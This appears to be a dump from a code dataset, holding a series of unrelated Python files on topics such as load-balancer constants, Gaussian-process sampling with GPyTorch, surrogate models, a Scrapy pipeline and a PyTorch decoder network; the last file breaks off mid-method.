content stringlengths 5 1.05M |
|---|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Mirantis, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
LB_METHOD_ROUND_ROBIN = 'ROUND_ROBIN'
LB_METHOD_LEAST_CONNECTIONS = 'LEAST_CONNECTIONS'
LB_METHOD_SOURCE_IP = 'SOURCE_IP'
PROTOCOL_TCP = 'TCP'
PROTOCOL_HTTP = 'HTTP'
PROTOCOL_HTTPS = 'HTTPS'
HEALTH_MONITOR_PING = 'PING'
HEALTH_MONITOR_TCP = 'TCP'
HEALTH_MONITOR_HTTP = 'HTTP'
HEALTH_MONITOR_HTTPS = 'HTTPS'
SESSION_PERSISTENCE_SOURCE_IP = 'SOURCE_IP'
SESSION_PERSISTENCE_HTTP_COOKIE = 'HTTP_COOKIE'
SESSION_PERSISTENCE_APP_COOKIE = 'APP_COOKIE'
STATS_CURRENT_CONNECTIONS = 'CURRENT_CONNECTIONS'
STATS_MAX_CONNECTIONS = 'MAX_CONNECTIONS'
STATS_CURRENT_SESSIONS = 'CURRENT_SESSIONS'
STATS_MAX_SESSIONS = 'MAX_SESSIONS'
STATS_TOTAL_SESSIONS = 'TOTAL_SESSIONS'
STATS_IN_BYTES = 'IN_BYTES'
STATS_OUT_BYTES = 'OUT_BYTES'
STATS_CONNECTION_ERRORS = 'CONNECTION_ERRORS'
STATS_RESPONSE_ERRORS = 'RESPONSE_ERRORS'
|
#!/usr/bin/env python
# encoding: utf-8
'''
@author: Jason Lee
@license: (C) Copyright @ Jason Lee
@contact: jiansenll@163.com
@file: jianzhi_offer_39.py
@time: 2019/5/13 14:40
@desc:
'''
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def TreeDepth(self, pRoot):
if not pRoot:
return 0
depth = max(self.TreeDepth(pRoot.left), self.TreeDepth(pRoot.right)) + 1
return depth
|
"""Populating the simple appointments database with the data supplied
by the user. Multiple appointment entries are possible.
"""
import sqlite3
from contextlib import closing
import datetime
from collections import namedtuple
DATABASE = 'week43.db'
User_entry = namedtuple('User_entry', [
'title', # title is compulsory
'comment', # comment can be empty
'start', # string representation of datetime object
'hours', # integer, hours of appointment duration
'minutes' # integer, minutes in addition to hours duration
])
def get_user_input():
"""Returns validated user input for inclusion into a database."""
print('--- New appointment entry ---')
while True:
title = input("Appointment's title? ")
if len(title) == 0:
print('Title can not be empty')
else:
break
while True:
print('Date and time of the appointment:')
day = input('\tDay? ')
month = input('\tMonth (number)? ')
year = input('\tYear? ')
hour = input('\tHour (24h clock)? ')
minute = input('\tMinute? ')
# successful conversion into datetime object indicates correct values
# entered by user
try:
start = datetime.datetime(int(year), int(month), int(day),
int(hour), int(minute))
break
except ValueError:
print('Please correct date and time')
while True:
print('Duration of the appointment:')
# hour and minute of appointment duration must be non-negative integers,
# total duration can not be zero
try:
hour = int(input('\tHours? '))
minute = int(input('\tMinutes? '))
if hour >= 0 and minute >= 0 and hour + minute > 0:
break
else:
print('Please correct duration time')
except ValueError:
print('Please correct duration time')
comment = input('Any comments? ')
return User_entry(title, comment, str(start), hour, minute)
# context manager assures that database connection is closed automatically
with closing(sqlite3.connect(DATABASE)) as con:
# sucessfull transactions are commited automatically
with con:
cur = con.cursor()
# appointments start and end timestamps are stored as UTC julian dates,
# therefore independent of time zones and daylight savings
cur.execute('''CREATE TABLE IF NOT EXISTS appointments (
title TEXT NOT NULL,
comment TEXT,
start REAL,
end REAL)''')
while True:
entry = get_user_input()
# the end timestamp is calculated during insertion using SQLite
# date and time function
cur.execute('''INSERT INTO appointments VALUES (
?, ?, julianday(?, 'utc'), julianday(?, ?, ?, 'utc'))''',
(entry.title, entry.comment, entry.start, entry.start,
f'+{entry.hours} hour', f'+{entry.minutes} minute'))
if input('Press Y to make next appointment: ').lower() != 'y':
break
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .get_alerts_by_host_id.action import GetAlertsByHostId
from .get_host_id_from_hostname.action import GetHostIdFromHostname
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import csv
from admincode import settings
def write_to_csv(item):
writer = csv.writer(
open(settings.CSV_FILE_PATH, 'a'), lineterminator='\n')
writer.writerow([item[key] for key in ['year', 'prov_name',
'city_name', 'city_code',
'county_name', 'county_code',
'town_name', 'town_code']])
class CsvExportPipeline(object):
def process_item(self, item, spider):
write_to_csv(item)
return item
class AdmincodePipeline(object):
def process_item(self, item, spider):
return item
|
import requests
import http.cookiejar, urllib.request
from bs4 import BeautifulSoup
class Google:
"""docstring for Google"""
def __init__(self, login, pwd):
url_login = "https://accounts.google.com/ServiceLogin"
url_auth = "https://accounts.google.com/ServiceLoginAuth"
self.cookie = http.cookiejar.MozillaCookieJar()
self.ses = requests.session()
self.ses.cookies = self.cookie
login_html = self.ses.get(url_login)
soup_login = BeautifulSoup(login_html.content, "lxml").find('form').find_all('input')
my_dict = {}
for u in soup_login:
if u.has_attr('value'):
my_dict[u['name']] = u['value']
my_dict['Email'] = login
my_dict['Passwd'] = pwd
self.ses.post(url_auth, data = my_dict)
def get(self, URL, header = {}):
return self.ses.get(URL, headers = header)
def post(self, URL, payload, header = {}):
return self.ses.post(URL, data = payload, headers = header)
Google ('', '') # your email and password
|
import numpy as np
from qore import Mine, ASP, QAOA, VQE
from qore.utils import measure_operator, get_bitstring_probabilities, identity
from qiskit.utils import algorithm_globals, QuantumInstance, quantum_instance
from qiskit.algorithms.optimizers import COBYLA
from qiskit.providers.aer import QasmSimulator, StatevectorSimulator
from qiskit.opflow import I, Z, Plus
from qore.benchmark import Benchmark
# define a callback function
def analysis(circ, iter):
print(f"--- Iter {iter} ---")
x = get_bitstring_probabilities(circ)
bitstr, prob = max(x.items(), key=lambda item: item[1])
print(f"The most probable configuration and the corresponding probability: {bitstr, prob}")
qmine.plot_mine_state(bitstr)
if __name__ == "__main__":
penalty = 10.0
qmine = Mine(np.array([[-2.0, 3.0, 1.0], [float("inf"), 5.0, float("inf")]]))
qmine = Mine(
np.array(
[
[-2.0, 3.0, -1.0, -2.0, -1.0],
[float("inf"), 1.0, -5.0, 10.0, float("inf")],
[float("inf"), float("inf"), 4.0, float("inf"), float("inf")],
]
)
)
qmine.plot_mine()
# algorithm_globals.random_seed = 1953
algorithm_globals.massive = True
evol_time = 10
nsteps = 20
asp = ASP(
evol_time,
nsteps,
# callback=analysis,
# callback_freq=5,
quantum_instance=QasmSimulator(),
)
res = qmine.solve(asp, False, False)
print(res)
|
import xml.etree.ElementTree as ET
from django.db import transaction
from django.core.management.base import BaseCommand, CommandError
import raster.models as models
IGNORE_LABEL = ['no data']
class Command(BaseCommand):
help = 'Load a legend from a qml file'
def add_arguments(self, parser):
parser.add_argument('legend_name', type=str)
parser.add_argument('legend_file', type=str)
def handle(self, *args, **options):
legend_name = options['legend_name']
legend_file = options['legend_file']
self.parse_and_import(legend_name, legend_file)
self.stdout.write('Successfully imported legend "%s"' % legend_name)
def parse_and_import(self, legend_name, legend_file):
tree = ET.parse(legend_file)
root = tree.getroot()
colors = root.findall('./pipe/rasterrenderer/colorPalette/paletteEntry')
with transaction.atomic():
try:
legend = models.Legend.objects.get(title=legend_name)
raise CommandError('legend already exists')
except models.Legend.DoesNotExist:
pass
legend = models.Legend(title=legend_name)
legend.save()
for pe in colors:
pe_value = pe.attrib['value']
pe_color = pe.attrib['color']
pe_label = pe.attrib['label']
if pe_label.lower() in IGNORE_LABEL:
continue
pe_expression = 'x == {0}'.format(pe_value)
semantic = models.LegendSemantics(name=pe_label)
semantic.save()
legend_entry = models.LegendEntry(semantics=semantic,
expression=pe_expression,
color=pe_color)
legend_entry.save()
legend.entries.add(legend_entry)
legend.save()
|
# Author: Parag Mali
# This file performs postprocessing on the detection results
# so that it perfectly contains the connected components
import numpy as np
import cv2
def convert_to_binary(image):
# convert image to binary
gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
im_bw = np.zeros(gray_image.shape)
im_bw[gray_image > 127] = 0
im_bw[gray_image <= 127] = 1
return im_bw
def adjust_box_p(args):
im_bw, box = args
return adjust_box(im_bw, box)
def adjust_box(im_bw, box):
# expand or contract the bounding box to fit the math expression
box = [int(np.round(x)) for x in box]
box = contract(im_bw, box)
box = expand(im_bw, box)
return box
def contract(im_bw, box):
# find first row with one pixel
rows_with_pixels = np.any(im_bw[box[1]:box[3], box[0]:box[2]], axis=1)
cols_with_pixels = np.any(im_bw[box[1]:box[3], box[0]:box[2]], axis=0)
if len(rows_with_pixels==True) == 0 or len(cols_with_pixels==True) == 0:
box = [0,0,0,0]
return box
left = box[0] + np.argmax(cols_with_pixels==True)
top = box[1] + np.argmax(rows_with_pixels==True)
right = box[0] + len(cols_with_pixels) - np.argmax(cols_with_pixels[::-1]==True) - 1
bottom = box[1] + len(rows_with_pixels) - np.argmax(rows_with_pixels[::-1]==True) - 1
box[0] = left
box[1] = top
box[2] = right
box[3] = bottom
return box
def expand(im_bw, box):
im_copy = np.copy(im_bw)
im_copy[box[1]:box[3], box[0]:box[2]] = 1
start = (box[1], box[0])
queue = [start]
visited = set()
while len(queue) != 0:
front = queue.pop(0)
if front not in visited:
for adjacent_space in get_adjacent_spaces(im_copy, front, visited):
queue.append(adjacent_space)
box[0] = min(front[1], box[0]) #left
box[1] = min(front[0], box[1]) #top
box[2] = max(front[1], box[2]) # left + width
box[3] = max(front[0], box[3]) # top + height
visited.add(front)
return box
def get_adjacent_spaces(im_bw, space, visited):
spaces = list()
dirs = [[1,0],[-1,0],[0,1],[0,-1]]
for dir in dirs:
r = space[0] + dir[0]
c = space[1] + dir[1]
if r < im_bw.shape[0] and c < im_bw.shape[1] and r >= 0 and c >= 0:
spaces.append((r, c))
final = list()
for i in spaces:
if im_bw[i[0]][i[1]] == 1 and i not in visited:
final.append(i)
return final
|
from solns.graph.graph import *
class Solution:
@staticmethod
def naive(G,s,visited,seq):
if s not in visited:
visited.add(s)
seq+=str(s)
for child in G[s]:
if child not in visited:
seq = Solution.naive(G,child,visited,seq)
return seq |
'''
Implement the BSTIterator class that represents an iterator over the in-order traversal of a binary search tree (BST):
BSTIterator(TreeNode root) Initializes an object of the BSTIterator class. The root of the BST is given as part of the constructor. The pointer should be initialized to a non-existent number smaller than any element in the BST.
boolean hasNext() Returns true if there exists a number in the traversal to the right of the pointer, otherwise returns false.
int next() Moves the pointer to the right, then returns the number at the pointer.
Notice that by initializing the pointer to a non-existent smallest number, the first call to next() will return the smallest element in the BST.
You may assume that next() calls will always be valid. That is, there will be at least a next number in the in-order traversal when next() is called.
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class BSTIterator(object):
def __init__(self, root):
"""
:type root: TreeNode
"""
self.stack = [root]
self.size = 1
def next(self):
"""
:rtype: int
"""
while self.stack:
node = self.stack.pop()
if not node:
node = self.stack.pop()
self.size = len(self.stack)
return node.val
if node.right:
self.stack.append(node.right)
self.stack.append(node)
self.stack.append(None)
if node.left:
self.stack.append(node.left)
return None
def hasNext(self):
"""
:rtype: bool
"""
return self.size > 0
# Your BSTIterator object will be instantiated and called as such:
# obj = BSTIterator(root)
# param_1 = obj.next()
# param_2 = obj.hasNext() |
#!/usr/bin/env python
# coding: utf-8
# # Fully Bayesian GPs - Sampling Hyperparamters with NUTS
#
# In this notebook, we'll demonstrate how to integrate GPyTorch and NUTS to sample GP hyperparameters and perform GP inference in a fully Bayesian way.
#
# The high level overview of sampling in GPyTorch is as follows:
#
# 1. Define your model as normal, extending ExactGP and defining a forward method.
# 2. For each parameter your model defines, you'll need to register a GPyTorch prior with that parameter, or some function of the parameter. If you use something other than a default closure (e.g., by specifying a parameter or transformed parameter name), you'll need to also specify a setting_closure: see the docs for `gpytorch.Module.register_prior`.
# 3. Define a pyro model that has a sample site for each GP parameter. For your convenience, we define a `pyro_sample_from_prior` method on `gpytorch.Module` that returns a copy of the module where each parameter has been replaced by the result of a `pyro.sample` call.
# 4. Run NUTS (or HMC etc) on the pyro model you just defined to generate samples. Note this can take quite a while or no time at all depending on the priors you've defined.
# 5. Load the samples in to the model, converting the model from a simple GP to a batch GP (see our example notebook on simple batch GPs), where each GP in the batch corresponds to a different hyperparameter sample.
# 6. Pass test data through the batch GP to get predictions for each hyperparameter sample.
# In[1]:
import math
import torch
import Lgpytorch
import pyro
from pyro.infer.mcmc import NUTS, MCMC, HMC
from matplotlib import pyplot as plt
import arviz as az
# In[29]:
# Training data is 11 points in [0,1] inclusive regularly spaced
train_x = torch.linspace(0, 1, 5)
# True function is sin(2*pi*x) with Gaussian noise
train_y = torch.sin(train_x * (2 * math.pi)) + torch.randn(train_x.size()) * 0.2
# In[41]:
# We will use the simplest form of GP model, exact inference
class ExactGPModel(Lgpytorch.models.ExactGP):
def __init__(self, train_x, train_y, likelihood):
super(ExactGPModel, self).__init__(train_x, train_y, likelihood)
self.mean_module = Lgpytorch.means.ConstantMean()
self.covar_module = Lgpytorch.kernels.ScaleKernel(Lgpytorch.kernels.RBFKernel())
def forward(self, x):
mean_x = self.mean_module(x)
covar_x = self.covar_module(x)
return Lgpytorch.distributions.MultivariateNormal(mean_x, covar_x)
# ## Running Sampling
#
# The next cell is the first piece of code that differs substantially from other work flows. In it, we create the model and likelihood as normal, and then register priors to each of the parameters of the model. Note that we directly can register priors to transformed parameters (e.g., "lengthscale") rather than raw ones (e.g., "raw_lengthscale"). This is useful, **however** you'll need to specify a prior whose support is fully contained in the domain of the parameter. For example, a lengthscale prior must have support only over the positive reals or a subset thereof.
# In[59]:
# this is for running the notebook in our testing framework
import os
smoke_test = ('CI' in os.environ)
num_samples = 2 if smoke_test else 100
warmup_steps = 2 if smoke_test else 100
from gpytorch.priors import LogNormalPrior, NormalPrior, UniformPrior
# Use a positive constraint instead of usual GreaterThan(1e-4) so that LogNormal has support over full range.
likelihood = Lgpytorch.likelihoods.GaussianLikelihood(noise_constraint=Lgpytorch.constraints.Positive())
model = ExactGPModel(train_x, train_y, likelihood)
model.mean_module.register_prior("mean_prior", UniformPrior(-1, 1), "constant")
model.covar_module.base_kernel.register_prior("lengthscale_prior", UniformPrior(0.01, 0.5), "lengthscale")
model.covar_module.register_prior("outputscale_prior", UniformPrior(1, 2), "outputscale")
likelihood.register_prior("noise_prior", UniformPrior(0.01, 0.5), "noise")
mll = Lgpytorch.mlls.ExactMarginalLogLikelihood(likelihood, model)
def pyro_model(x, y):
with Lgpytorch.settings.fast_computations(False, False, False):
sampled_model = model.pyro_sample_from_prior()
output = sampled_model.likelihood(sampled_model(x))
pyro.sample("obs", output, obs=y)
return y
num_chains = 1
warmup_steps = 100
num_samples = 100
if __name__ == '__main__':
nuts_kernel = NUTS(pyro_model)
mcmc_run = MCMC(nuts_kernel, num_samples=num_samples, warmup_steps=warmup_steps, disable_progbar=smoke_test, num_chains= num_chains)
mcmc_run.run(train_x, train_y)
# ## Loading Samples
#
# In the next cell, we load the samples generated by NUTS in to the model. This converts `model` from a single GP to a batch of `num_samples` GPs, in this case 100.
#mcmc_run.diagnostics()
mcmc_run.summary(prob = 0.95)
az.plot_pair(az.from_pyro(mcmc_run))
plt.show()
az.plot_trace(az.from_pyro(mcmc_run))
plt.show()
# In[60]:
model.pyro_load_from_samples(mcmc_run.get_samples())
# In[61]:
model.eval()
test_x = torch.linspace(0, 1, 101).unsqueeze(-1)
test_y = torch.sin(test_x * (2 * math.pi))
expanded_test_x = test_x.unsqueeze(0).repeat(num_samples * num_chains, 1, 1)
output = model(expanded_test_x)
# ## Plot Mean Functions
#
# In the next cell, we plot the first 25 mean functions on the samep lot. This particular example has a fairly large amount of data for only 1 dimension, so the hyperparameter posterior is quite tight and there is relatively little variance.
# In[62]:
with torch.no_grad():
# Initialize plot
f, ax = plt.subplots(1, 1, figsize=(4, 3))
# Plot training data as black stars
ax.plot(train_x.numpy(), train_y.numpy(), 'k*', zorder=10)
for i in range(min(num_samples, 25)):
# Plot predictive means as blue line
ax.plot(test_x.numpy(), output.mean[i].detach().numpy(), 'b', linewidth=0.3)
# Shade between the lower and upper confidence bounds
# ax.fill_between(test_x.numpy(), lower.numpy(), upper.numpy(), alpha=0.5)
ax.set_ylim([-3, 3])
ax.legend(['Observed Data', 'Sampled Means'])
plt.show()
# ## Simulate Loading Model from Disk
#
# Loading a fully Bayesian model from disk is slightly different from loading a standard model because the process of sampling changes the shapes of the model's parameters. To account for this, you'll need to call `load_strict_shapes(False)` on the model before loading the state dict. In the cell below, we demonstrate this by recreating the model and loading from the state dict.
#
# Note that without the `load_strict_shapes` call, this would fail.
# In[63]:
state_dict = model.state_dict()
model = ExactGPModel(train_x, train_y, likelihood)
# Load parameters without standard shape checking.
model.load_strict_shapes(False)
model.load_state_dict(state_dict)
# In[ ]:
|
# Copyright (c) 2019, salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: MIT
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/MIT
from .base import BaseLearner
import numpy as np
class BaseGridOracleLearner(BaseLearner):
AGENT_TYPE = 'GridOracle'
def __init__(self,
*args,
grid_size=2,
rew_per_grid=0.01,
**kwargs):
super().__init__(*args, **kwargs)
self.distance = []
self.locs_visited = set()
self.grid_size = grid_size
assert self.grid_size > 0
self.rew_per_grid = float(rew_per_grid)
assert self.rew_per_grid >= 0
@property
def was_success(self):
return bool(self.agent.env.is_success)
@property
def n_steps(self):
return int(len(self.agent.episode))
@property
def dist_to_goal(self):
return float(self.distance[-1])
@property
def unique_visitations(self):
return float(len(self.locs_visited))
def _reset_ep_stats(self):
super()._reset_ep_stats()
self.distance = []
self.locs_visited = set()
def _count_visitation(self, coords):
x, y = coords + 0.5
discritized_x = int(np.floor(x.item() / self.grid_size))
discritized_y = int(np.floor(y.item() / self.grid_size))
self.locs_visited.add((discritized_x, discritized_y))
def relabel_episode(self):
self._compress_me = []
for e in self.agent.episode:
e['reward'] *= 0
e['reward'] += e['complete']
self.distance.append(self._dummy_env.dist(e['next_state'], e['goal']).item())
# Manage set of visited locs
self._count_visitation(coords=e['next_state'][:2])
# Add grid oracle reward to terminal action
self.agent.episode[-1]['reward'] += self.rew_per_grid * self.unique_visitations
self._compress_me.append(self.agent.episode)
self._add_im_reward()
def fill_summary(self, *values):
manual_summary = [float(self.was_success), float(self.dist_to_goal), float(self.unique_visitations)]
for v in values:
manual_summary.append(v.item())
self._ep_summary = manual_summary
|
#!/usr/bin/env python3
import requests
import json
client_token = 'Aea84abc487da11e9afa48308d39e8e0aBAZHello'
url = 'http://localhost:4000/api/user_api_request_inc' # Use for local testing
payload = {'client_token': client_token, 'user_id': 1, 'api_id': 1}
headers = {'content-type': 'application/json'}
r = requests.post(url, data=json.dumps(payload), headers=headers)
print(r.status_code)
print(r.text)
|
"""
Abstract base class for all surrogate models.
Class structure:
- Surrogate
- GaussianProcess
- GPSurrogate (Custom)
- GPySurrogate (GPy)
- SklearnGPSurrogate (Sklearn)
- ANN
- ANNSurrogate (Pytorch)
- Autoencoder (Pytorch)
- LinearRegression
- Linear regression surrogates (Work in progress)
"""
from abc import abstractmethod
import numpy as np
from profit.util.base_class import CustomABC
from profit.defaults import fit as defaults
class Surrogate(CustomABC):
"""Base class for all surrogate models.
Attributes:
trained (bool): Flag that indicates if the model is already trained and ready to make predictions.
fixed_sigma_n (bool): Indicates if the data noise should be optimized or not.
Xtrain (ndarray): Input training points.
ytrain (ndarray): Observed output data.
Vector output is supported for independent variables only.
ndim (int): Dimension of input data.
output_ndim (int): Dimension of output data.
encoder (list of profit.sur.encoders.Encoder): For now, inputs of kind 'LogUniform' are encoded with 'log10'
and all input and output data is normalized. Can be modified in the config file using the format
e.g. [['log10', [0], False], ['normalization', [0, 1], False]].
Default parameters:
surrogate: GPy
save: ./model_{surrogate_label}.hdf5
load: False
fixed_sigma_n: False
encoder: [['log10', [log_input_cols], False], ['normalization', [input_cols], False],
['normalization', [output_cols], True]]
"""
labels = {} # All surrogates are registered here
def __init__(self):
self.trained = False
self.fixed_sigma_n = False
self.Xtrain = None
self.ytrain = None
self.ndim = None # TODO: Consistency between len(base_config['input']) and self.Xtrain.shape[-1]
self.output_ndim = 1
self.encoder = []
def encode_training_data(self):
"""Encodes the input and output training data.
"""
for enc in self.encoder:
if enc.work_on_output:
self.ytrain = enc.encode(self.ytrain)
else:
self.Xtrain = enc.encode(self.Xtrain)
def decode_training_data(self):
"""Applies the decoding function of the encoder in reverse order on the input and output training data.
"""
for enc in self.encoder[::-1]:
if enc.work_on_output:
self.ytrain = enc.decode(self.ytrain)
else:
self.Xtrain = enc.decode(self.Xtrain)
def encode_predict_data(self, x):
"""Transforms the input prediction points according to the encoder used for training.
Parameters:
x (ndarray): Prediction input points.
Returns:
ndarray: Encoded and normalized prediction points.
"""
for enc in self.encoder:
if not enc.work_on_output:
x = enc.encode(x)
return x
def decode_predict_data(self, ym, yv):
"""Rescales and then back-transforms the predicted output.
Parameters:
ym (ndarray): Predictive output.
yv (ndarray): Variance of predicted output.
Returns:
tuple: a tuple containing:
- ym (ndarray) Rescaled and decoded output values at the test input points.
- yv (ndarray): Rescaled predictive variance.
"""
for enc in self.encoder[::-1]:
if enc.work_on_output:
if enc.label == 'Normalization':
# TODO: Move this somewhere inside the Encoder with a flag like 'work_on_variance'?
yv = yv * enc.variables['xmax'] ** 2
ym = enc.decode(ym)
return ym, yv
@abstractmethod
def train(self, X, y, fixed_sigma_n=defaults['fixed_sigma_n']):
r"""Trains the surrogate on input points X and model outputs y.
Depending on the surrogate, the signature can vary.
Parameters:
X (ndarray): Input training points.
y (ndarray): Observed output data.
fixed_sigma_n (bool): Whether the noise $\sigma_n$ is fixed during optimization.
"""
pass
@abstractmethod
def predict(self, Xpred, add_data_variance=True):
r"""Predicts model output y for input Xpred based on surrogate.
Parameters:
Xpred (ndarray/list): Input points for prediction.
add_data_variance (bool): Adds the data noise $\sigma_n^2$ to the prediction variance.
This is especially useful for plotting.
Returns:
tuple: a tuple containing:
- ymean (ndarray) Predicted output values at the test input points.
- yvar (ndarray): Generally the uncertainty of the fit. For Gaussian Processes this is
the diagonal of the posterior covariance matrix.
"""
pass
@abstractmethod
def save_model(self, path):
"""Saves the surrogate to a file. The file format can vary between surrogates.
As default, the surrogate is saved to 'base_dir/model_{surrogate_label}.hdf5'.
Parameters:
path (str): Path including the file name, where the model should be saved.
"""
pass
@classmethod
@abstractmethod
def load_model(cls, path):
"""Loads a saved surrogate from a file. The file format can vary between surrogates.
Identifies the surrogate by its class label in the file name.
Parameters:
path (str): Path including the file name, from where the model should be loaded.
Returns:
profit.sur.Surrogate: Instantiated surrogate model.
"""
label = defaults['surrogate']
for f in filter(lambda l: l in path, cls.labels):
if len(f) > len(label):
label = f
return cls[label].load_model(path)
@classmethod
@abstractmethod
def from_config(cls, config, base_config):
"""Instantiates a surrogate based on the parameters given in the configuration file and delegates to child.
Parameters:
config (dict): Only the 'fit' part of the base_config.
base_config (dict): The whole configuration parameters.
"""
from .encoders import Encoder
child = cls[config['surrogate']]
if config.get('load'):
child_instance = child.load_model(config['load'])
else:
child_instance = child.from_config(config, base_config)
# Set global attributes
child_instance.ndim = len(base_config['input'])
child_instance.output_ndim = len(base_config['output'])
child_instance.fixed_sigma_n = config['fixed_sigma_n']
child_instance.encoder = [Encoder[func](cols, out) for func, cols, out in config['encoder']]
return child_instance
def plot(self, Xpred=None, independent=None, show=False, ref=None, add_data_variance=True, axes=None):
r"""Simple plotting for dimensions <= 2.
Fore more sophisticated plots use the command 'profit ui'.
Parameters:
Xpred (ndarray): Prediction points where the fit is plotted. If None, it is inferred from the
training points.
independent (dict): Dictionary of independent variables from config.
show (bool): If the figure should be shown directly.
ref (ndarray): Reference function which is fitted.
add_data_variance (bool): Adds the data noise $\sigma_n^2$ to the prediction variance.
axes (matplotlib.pyplot.axes): Axes object to insert the plot into. If None, a new figure is created.
"""
import matplotlib.pyplot as plt
if Xpred is None:
Xpred = self.default_Xpred()
ypred, yvarpred = self.predict(Xpred, add_data_variance=add_data_variance)
ystd_pred = np.sqrt(yvarpred)
if independent:
# 2D with one input parameter and one independent variable.
if self.ndim == 1 and ypred.ndim == 2:
ax = axes or plt.axes(projection='3d')
xind = np.hstack([v['value'] for v in independent.values()])
xtgrid = np.meshgrid(*[xind, self.Xtrain])
xgrid = np.meshgrid(*[xind, Xpred])
for i in range(self.Xtrain.shape[0]):
ax.plot(xtgrid[0][i], xtgrid[1][i], self.ytrain[i], color='blue', linewidth=2)
ax.plot_surface(xgrid[0], xgrid[1], ypred, color='red', alpha=0.8)
ax.plot_surface(xgrid[0], xgrid[1], ypred + 2 * ystd_pred, color='grey', alpha=0.6)
ax.plot_surface(xgrid[0], xgrid[1], ypred - 2 * ystd_pred, color='grey', alpha=0.6)
else:
raise NotImplementedError("Plotting is only implemented for dimensions <= 2. Use profit ui instead.")
else:
if self.ndim == 1 and ypred.shape[-1] == 1:
# Only one input parameter to plot.
ax = axes or plt.axes()
if ref:
ax.plot(Xpred, ref(Xpred), color='red')
ax.plot(Xpred, ypred)
ax.scatter(self.Xtrain, self.ytrain, marker='x', s=50, c='k')
ax.fill_between(Xpred.flatten(),
ypred.flatten() + 2 * ystd_pred.flatten(), ypred.flatten() - 2 * ystd_pred.flatten(),
color='grey', alpha=0.6)
elif self.ndim == 2 and ypred.shape[-1] == 1:
# Two fitted input variables.
ax = axes or plt.axes(projection='3d')
ypred = ypred.flatten()
ystd_pred = ystd_pred.flatten()
ax.scatter(self.Xtrain[:, 0], self.Xtrain[:, 1], self.ytrain, color='red', alpha=0.8)
ax.plot_trisurf(Xpred[:, 0], Xpred[:, 1], ypred, color='red', alpha=0.8)
ax.plot_trisurf(Xpred[:, 0], Xpred[:, 1], ypred + 2 * ystd_pred, color='grey', alpha=0.6)
ax.plot_trisurf(Xpred[:, 0], Xpred[:, 1], ypred - 2 * ystd_pred, color='grey', alpha=0.6)
elif self.ndim == 1 and self.output_ndim == 2:
# One input variable and two outputs
ax = axes or plt.axes()
for d in range(self.output_ndim):
yp = ypred[:, d]
ystd_p = ystd_pred[:, d]
ax.scatter(self.Xtrain, self.ytrain[:, d], alpha=0.8)
ax.plot(Xpred, yp)
ax.fill_between(Xpred.flatten(), yp + 2 * ystd_p, yp - 2 * ystd_p, alpha=0.6)
else:
raise NotImplementedError("Plotting is only implemented for dimension <= 2. Use profit ui instead.")
if show:
plt.show()
def default_Xpred(self):
"""Infer prediction values from training points in each dimension.
Currently a dense grid is created. This becomes inefficient for > 3 dimensions.
Returns:
ndarray: Prediction points.
"""
if self.ndim <= 3:
minval = self.Xtrain.min(axis=0)
maxval = self.Xtrain.max(axis=0)
npoints = [50] * len(minval)
xpred = [np.linspace(minv, maxv, n) for minv, maxv, n in zip(minval, maxval, npoints)]
return np.hstack([xi.flatten().reshape(-1, 1) for xi in np.meshgrid(*xpred)])
else:
raise RuntimeError("Require x for prediction in > 3 dimensions!")
|
from .trainer import Trainer
from .evaluator import Evaluator
from .model import ModelFactory
|
"""
From https://github.com/fangchangma/sparse-to-dense.pytorch
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models
import collections
import math
class VariationalDecoderNet(torch.nn.Module):
def __init__(self, encoded_dims=100):
super(VariationalDecoderNet, self).__init__()
filters = 32
c_out = 2
# conditional input
self.label_input = nn.Sequential(
nn.Conv2d(2, filters, 8, 2, 3),
nn.LeakyReLU(.2),
nn.Conv2d(filters, filters * 2, 8, 2, 3),
nn.BatchNorm2d(filters * 2),
nn.LeakyReLU(.2),
nn.Conv2d(filters * 2, filters * 4, 8, 2, 3),
nn.BatchNorm2d(filters * 4),
nn.LeakyReLU(.2),
nn.Conv2d(filters * 4, filters * 8, 8, 2, 3),
nn.BatchNorm2d(filters * 8),
nn.LeakyReLU(.2),
nn.Conv2d(filters * 8, filters * 8, 8, 2, 3),
nn.BatchNorm2d(filters * 8),
nn.LeakyReLU(.2)
)
# upsample
self.unembedder = nn.Sequential(
nn.ConvTranspose2d(encoded_dims, filters * 8, 8, 1, 0),
nn.BatchNorm2d(filters * 8),
nn.LeakyReLU(.2),
)
self.hidden1 = nn.Sequential(
nn.ConvTranspose2d(filters * 16, filters * 8, 8, 2, 3),
nn.BatchNorm2d(filters * 8),
nn.LeakyReLU(.2),
)
self.hidden2 = nn.Sequential(
nn.ConvTranspose2d(filters * 8, filters * 4, 8, 2, 3),
nn.BatchNorm2d(filters * 4),
nn.LeakyReLU(.2),
)
self.hidden3 = nn.Sequential(
nn.ConvTranspose2d(filters * 4, filters * 2, 8, 2, 3),
nn.BatchNorm2d(filters * 2),
nn.LeakyReLU(.2),
)
self.hidden4_dropout = nn.Sequential(
nn.ConvTranspose2d(filters * 2, filters, 8, 2, 3),
nn.BatchNorm2d(filters),
nn.LeakyReLU(.2),
)
self.out_dropout = nn.Sequential(
nn.ConvTranspose2d(filters, 1, 8, 2, 3),
nn.Tanh()
)
self.hidden4_noise = nn.Sequential(
nn.ConvTranspose2d(filters * 2, filters, 8, 2, 3),
nn.BatchNorm2d(filters),
nn.LeakyReLU(.2),
)
self.out_noise = nn.Sequential(
nn.ConvTranspose2d(filters, 1, 8, 2, 3),
nn.Tanh()
)
def weight_init(self, mean, std):
for m in self._modules:
